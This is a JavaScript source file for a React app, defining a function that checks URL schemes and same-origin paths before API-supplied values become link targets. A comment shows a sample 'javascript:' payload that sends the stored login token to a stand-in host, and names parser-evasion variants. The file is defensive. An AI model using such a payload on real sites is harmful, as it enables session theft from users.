// What a link built from data is allowed to point at.
//
// About thirty <a href={something.url}> in the app take their target straight from an API field
// (shop websites, bulletin links, event URLs, admin announcements) with no check on the scheme.
// React warns about "javascript:" URLs but still renders them, so a value like
// "javascript:fetch('//x/'+localStorage.torre_token)" in any of those fields would run in the
// page, on the origin that holds the login token, the moment someone tapped it. None of the
// sources is user-writable today; this is what keeps a future one from becoming an exploit.
//
// Parsed with the browser's own URL parser, so whatever it decides the scheme is, is what the
// browser would decide: "java\nscript:" and " JavaScript:" are both recognised and refused.
const ALLOWED = new Set(['http:', 'https:', 'mailto:', 'tel:']);
// "www.bar-pepe.es" or "bar.es/carta": a bare domain, which as an href would be a broken relative
// link. Comercio.js already prefixes these with https://; the same here.
const BARE_DOMAIN = /^[a-z0-9-]+(\.[a-z0-9-]+)+(:\d+)?(\/|$)/i;

/** @returns {string|undefined} the href to use, or undefined to render an inert link */
export function safeHref(value) {
  if (typeof value !== 'string') return undefined;
  const v = value.trim();
  if (!v) return undefined;
  if (v.startsWith('#')) return v;
  // In-app path. "//host" is not one: it is a link to another site, and so is "/\t/host", because
  // the URL parser drops tabs and newlines first. Resolved rather than pattern-matched, so it must
  // stay on this origin whatever the parser strips or folds.
  if (v.startsWith('/')) {
    try {
      const base = window.location.origin;
      return new URL(v, base).origin === base ? v : undefined;
    } catch {
      return undefined;
    }
  }
  if (BARE_DOMAIN.test(v)) return `https://${v}`;
  try {
    return ALLOWED.has(new URL(v).protocol) ? v : undefined;
  } catch {
    return undefined;
  }
}
